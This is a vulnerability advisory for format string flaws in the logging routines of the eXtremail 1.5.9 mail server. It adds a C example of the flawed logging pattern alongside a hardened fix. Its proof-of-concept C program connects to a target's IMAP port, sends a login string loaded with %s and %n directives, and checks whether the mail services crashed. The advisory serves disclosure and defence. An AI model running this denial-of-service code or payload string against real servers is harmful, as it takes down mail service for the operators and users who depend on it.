
Remote Format String Vulnerabilities in eXtremail




Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String



What's eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing attack, SSL connection
and Antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers to various SMTP, POP and IMAP commands.
The vulnerability, previously reported to affect some earlier versions
(BugTraq ID: 2908), has been reintroduced in the latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial of service attack, eXtremail must be restarted
to regain its functionality (Smtpd, Pop3d, Imapd, Remt).
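
The flaw class described above, as an added C example that is not taken from the advisory or from eXtremail's source: a logging call that uses client text as the format string, next to the corrected call, plus a check that counts format directives in a client-supplied field. The function names are hypothetical, the message text mirrors the log snippet, and the login name is constructed sample input.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logger, not eXtremail's source; the attribute makes gcc/clang check call sites. */
__attribute__((format(printf, 3, 4)))
static int log_line(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outsz, fmt, ap);    /* bounded, always NUL-terminated */
    va_end(ap);
    return n;
}

#ifdef SHOW_VULNERABLE_PATTERN
/* Flawed pattern: client text ends up inside the format argument, so directives
 * in a login name are interpreted by the formatter. Not compiled by default. */
static int log_bad_user_vulnerable(char *out, size_t outsz, const char *user)
{
    char msg[256];
    snprintf(msg, sizeof msg, "IMAP - Error: User %s", user);
    return log_line(out, outsz, msg);          /* msg is used as the format */
}
#endif

/* Hardened form: constant format string, client text passed only as data. */
static int log_bad_user(char *out, size_t outsz, const char *user)
{
    return log_line(out, outsz, "IMAP - Error: User %s", user);
}

/* Detection aid: count '%' directives in a client field ("%%" and a trailing '%' are ignored). */
static int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        if (s[1] != '\0') n++;
    }
    return n;
}
int main(void)
{
    char line[128];
    log_bad_user(line, sizeof line, "%s%s%n");  /* constructed hostile login name */
    printf("%s (directives: %d)\n", line, count_format_directives("%s%s%n"));
    return 0;
}
```

With the constant format string the directives are logged as literal text; building with -Wformat -Wformat-security makes the compiler flag the pattern in the `#ifdef` block.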






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service          *
*                                             *
*  Luca Ercoli  <luca.e [at] seeweb.com>      *
*  Seeweb          http://www.seeweb.com      *
*                                             *
***********************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;  
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr; 
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL) 
     {  
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;   
 their_addr.sin_port = htons(PORT);  
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8); 

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }

   
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{
    
 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2) 
   {    
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }
 
 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;

 
}

-------------------------------



Solution:
No solution available at the moment.







Credits:

-- 
Luca Ercoli     <luca.e [at] seeweb.com>
Seeweb          http://www.seeweb.com